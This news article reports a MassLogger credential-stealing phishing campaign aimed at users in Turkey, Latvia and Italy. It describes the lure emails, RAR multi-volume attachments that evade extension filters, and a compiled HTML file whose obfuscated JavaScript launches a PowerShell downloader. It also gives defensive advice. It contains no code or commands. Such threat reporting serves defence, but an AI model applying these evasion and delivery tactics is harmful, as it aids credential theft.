New Phishing Campaign Targets Credentials Using MassLogger Malware
A resurgence of the MassLogger malware has been detected, targeting credentials from major platforms including Microsoft Outlook, Google Chrome, and various instant messaging applications. This phishing campaign, primarily aimed at users in Turkey, Latvia, and Italy, began in mid-January and builds upon previous operations that targeted users in several European countries during late 2020. The malware is known for its capabilities to evade static analysis, thereby highlighting the evolving nature of cyber threats and the persistent efforts of threat actors to refine their tactics.
MassLogger, a .NET-based credential stealer, was first identified in the wild in April of last year. Recent findings indicate that attackers are consistently updating their malware variants to circumvent detection and enhance monetization strategies. According to Cisco Talos researchers, the latest campaign stands out due to its innovative use of compiled HTML file formats to initiate the infection chain, marking a departure from previous tactics.
The phishing emails typically feature subject lines that appear legitimate and business-related. For instance, one email targeting Turkish users carried the subject line “Domestic customer inquiry” and referred to an attached quote. In contrast, earlier phishing attempts utilized documents styled as “memorandum of understanding,” prompting recipients to sign them. Regardless of the theme, these correspondence pieces frequently include attachments with RAR multi-volume file names, cleverly disguising malicious content to avoid filters focused solely on file extensions.
These RAR attachments contain a single compiled HTML file designed to mislead victims by displaying a benign message like “Customer service.” However, embedded within this file is obfuscated JavaScript code created to generate an HTML page that uses a PowerShell downloader. This downloader connects to a legitimate server to retrieve the final payload responsible for executing MassLogger, effectively compromising sensitive user data.
The latest iteration of MassLogger (version 3.0.7563.31381) possesses advanced capabilities, including the ability to extract credentials from various applications such as Discord, NordVPN, Thunderbird, and multiple Chromium-based browsers. Although MassLogger can function as a keylogger, researchers observed that this particular operation had disabled that feature, suggesting a targeted approach to data exfiltration.
As the attacks concluded, they predominantly lived in memory, with the only exception being the compiled HTML help file, underscoring the importance of regular memory scanning as a defensive measure. The researchers also emphasized that organizations should configure their systems to log PowerShell events, allowing for detailed visibility into executed scripts, which may reveal unmasked malicious code variations.
In conclusion, the resurgence of MassLogger serves as a reminder of the dynamic nature of cyber threats. Business owners, especially those engaged with remote work and digital communications, must remain vigilant against such sophisticated phishing schemes. Utilizing frameworks like the MITRE ATT&CK matrix can further inform organizational defenses against tactics such as initial access and data exfiltration employed in these ongoing cyber campaigns.
